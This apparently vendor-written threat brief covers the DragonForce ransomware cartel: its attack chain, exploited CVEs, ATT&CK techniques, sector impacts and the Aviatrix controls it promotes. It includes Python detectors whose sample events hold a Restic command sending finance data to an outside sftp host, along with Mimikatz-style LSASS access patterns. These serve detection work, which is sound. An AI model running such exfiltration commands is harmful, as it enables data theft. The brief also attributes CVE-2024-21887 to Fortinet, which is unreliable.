Executive Summary
In March 2025, the DragonForce ransomware group rebranded itself as a cartel, allowing affiliates to create their own brands while utilizing DragonForce's infrastructure and tools. This strategic shift led to increased collaboration among ransomware groups, notably with LockBit and Qilin, aiming to consolidate power and enhance operational effectiveness. The cartel model facilitated larger, more coordinated ransomware campaigns, employing advanced tactics such as double extortion, exploitation of known vulnerabilities, and the use of sophisticated tools like Cobalt Strike and Mimikatz. This evolution resulted in a significant uptick in ransomware incidents, impacting various sectors globally, including government entities, retail operations, manufacturing companies, and construction firms. The formation of such cartels underscores a concerning trend in the cyber threat landscape, where ransomware groups are increasingly collaborating to amplify their reach and impact. This development necessitates heightened vigilance and adaptive defense strategies from organizations to mitigate the evolving threats posed by these alliances.
Why This Matters Now
The emergence of ransomware cartels like DragonForce's signifies a shift towards more organized and potent cyber threats, demanding immediate attention and enhanced cybersecurity measures from organizations worldwide.
Attack Path Analysis
DragonForce initiated the attack by exploiting unpatched vulnerabilities in internet-facing services to gain initial access. They escalated privileges using tools like Mimikatz to harvest credentials. The attackers moved laterally through the network by abusing RDP and deploying Cobalt Strike. They established command and control channels using SystemBC to maintain persistent access. Sensitive data was exfiltrated using tools like Restic before encrypting systems. Finally, they encrypted critical data and demanded ransom, employing double extortion tactics.
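The chain above (LSASS credential harvesting, RDP fan-out, Restic backup to a remote repository as the exfiltration step) leaves distinct traces in endpoint telemetry. The following Python is an added example, not code from the report or from any of the tooling it names; it assumes Sysmon and Windows Security events already normalised into dicts, a constructed sample batch of events, and an assumed allowlist of processes that legitimately open lsass.exe.

```python
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample telemetry (not real logs): Sysmon EID 1 process creation,
# Sysmon EID 10 process access, Security EID 4624 logon (LogonType 10 = RDP).
EVENTS = [
    {"id": 10, "host": "WS01", "SourceImage": r"C:\Users\a\mimi.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"id": 10, "host": "WS01", "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"id": 4624, "host": "SRV01", "user": "CORP\\admin", "LogonType": 10, "src_ip": "10.0.5.23"},
    {"id": 4624, "host": "SRV02", "user": "CORP\\admin", "LogonType": 10, "src_ip": "10.0.5.23"},
    {"id": 4624, "host": "SRV03", "user": "CORP\\admin", "LogonType": 10, "src_ip": "10.0.5.23"},
    {"id": 4624, "host": "SRV01", "user": "CORP\\bob", "LogonType": 10, "src_ip": "10.0.7.9"},
    {"id": 1, "host": "SRV02", "Image": r"C:\Temp\restic.exe", "CommandLine": r"restic.exe -r sftp:u@203.0.113.5:/b backup D:\Finance"},
    {"id": 1, "host": "SRV03", "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "lsm.exe"}  # assumed baseline, tune per estate
REMOTE_REPO_PREFIXES = ("sftp:", "s3:", "rest:", "b2:", "azure:", "gs:")     # restic remote backend schemes

def detect_lsass_access(events):
    """Sysmon EID 10: a process outside the allowlist opening lsass.exe (Mimikatz-style credential dumping)."""
    hits = []
    for e in events:
        if e.get("id") == 10 and PureWindowsPath(e["TargetImage"]).name.lower() == "lsass.exe":
            src = PureWindowsPath(e["SourceImage"]).name.lower()
            if src not in LSASS_ALLOWLIST:
                hits.append((e["host"], src))
    return hits

def detect_rdp_fanout(events, threshold=3):
    """Security EID 4624 / LogonType 10: one source IP and account reaching >= threshold distinct hosts."""
    targets = defaultdict(set)
    for e in events:
        if e.get("id") == 4624 and e.get("LogonType") == 10:
            targets[(e["src_ip"], e["user"])].add(e["host"])
    return {k: sorted(v) for k, v in targets.items() if len(v) >= threshold}

def detect_restic_exfil(events):
    """Sysmon EID 1: restic running a backup against a remote repository (the exfiltration step in the chain)."""
    hits = []
    for e in events:
        if e.get("id") == 1 and PureWindowsPath(e["Image"]).name.lower() == "restic.exe":
            cmd = e["CommandLine"].lower()
            if "backup" in cmd and any(p in cmd for p in REMOTE_REPO_PREFIXES):
                hits.append((e["host"], e["CommandLine"]))
    return hits
```

Each detector returns the matching hosts so the three can be correlated by host and time in a SIEM; a legitimate backup job using Restic would need its own allowlisted repository to avoid false positives.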
Kill Chain Progression
Initial Compromise
Description
Exploited unpatched vulnerabilities in internet-facing services to gain initial access.
Related CVEs
CVE-2021-44228
CVSS 10 – Apache Log4j2 Remote Code Execution Vulnerability.
Affected Products:
Apache Log4j2 – 2.0-beta9 to 2.14.1
Exploit Status:
Exploited in the wild

CVE-2024-21887
CVSS 9.1 – Arbitrary Command Execution in Fortinet FortiOS and FortiProxy.
Affected Products:
Fortinet FortiOS – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Fortinet FortiProxy – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Exploit Status:
Exploited in the wild

CVE-2024-21762
CVSS 9.8 – Heap-based Buffer Overflow in Fortinet FortiOS and FortiProxy.
Affected Products:
Fortinet FortiOS – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Fortinet FortiProxy – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Exploit Status:
Exploited in the wild
MITRE ATT&CK® Techniques
Phishing
Exploit Public-Facing Application
Valid Accounts
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Access Token Manipulation
Obfuscated Files or Information
File and Directory Discovery
Remote Services
Data Encrypted for Impact
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA Zero Trust Maturity Model 2.0 – Implement strong authentication mechanisms
Control ID: Identity Pillar
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
DragonForce cartel coordination threatens HIPAA-regulated patient data through sophisticated lateral movement, encrypted traffic exfiltration, and organized multi-gang ransomware operations.
Banking/Mortgage
Financial institutions face elevated risk from coordinated ransomware cartels targeting payment systems, with advanced egress filtering and zero trust segmentation critical for protection.
Government Administration
Government agencies are vulnerable to organized ransomware cartels that exploit multi-cloud visibility gaps, and need enhanced threat detection and east-west traffic security controls immediately.
Information Technology/IT
The IT sector faces compound risk as both a target and an enabler of these campaigns, and needs comprehensive Kubernetes security, cloud firewall protection, and inline IPS against coordinated attacks.
Sources
- Ransomware Gang Goes Full 'Godfather' With Cartel – https://www.darkreading.com/cyber-risk/ransomware-gang-full-godfather-cartel
- DragonForce Ransomware Report – https://www.quorumcyber.com/malware-reports/dragonforce-ransomware-report/
- DragonForce Calls for Ransomware Cartel with LockBit and Qilin – https://www.quorumcyber.com/threat-intelligence/threat-assessment-dragonforce-calls-for-ransomware-cartel-with-lockbit-and-qilin/
- DragonForce Ransomware: Redefining Hybrid Extortion in 2025 – https://blog.checkpoint.com/security/dragonforce-ransomware-redefining-hybrid-extortion-in-2025/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have significantly limited the attacker's ability to move laterally, escalate privileges, and exfiltrate data by enforcing strict segmentation and identity-aware policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: While Aviatrix CNSF may not prevent initial exploitation, it would likely limit the attacker's ability to exploit further vulnerabilities within the internal network.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation would likely limit the attacker's ability to access sensitive systems, even with escalated privileges.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security would likely constrain the attacker's ability to move laterally across the network.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control would likely limit the attacker's ability to maintain persistent command and control channels.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement would likely limit the attacker's ability to exfiltrate sensitive data.
While Aviatrix controls may not prevent data encryption, they would likely limit the attacker's ability to access and encrypt additional systems.
Impact at a Glance
Affected Business Functions
- Retail Operations
- Supply Chain Management
- Customer Service
Estimated downtime: 14 days
Estimated loss: $5,000,000
Data at risk: Customer PII and payment information.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement and enforce least privilege access.
- Deploy East-West Traffic Security controls to monitor and control internal traffic, detecting unauthorized movements.
- Utilize Egress Security & Policy Enforcement to prevent unauthorized data exfiltration and command and control communications.
- Enhance Threat Detection & Anomaly Response capabilities to identify and respond to malicious activities promptly.
- Regularly update and patch internet-facing services to mitigate exploitation of known vulnerabilities.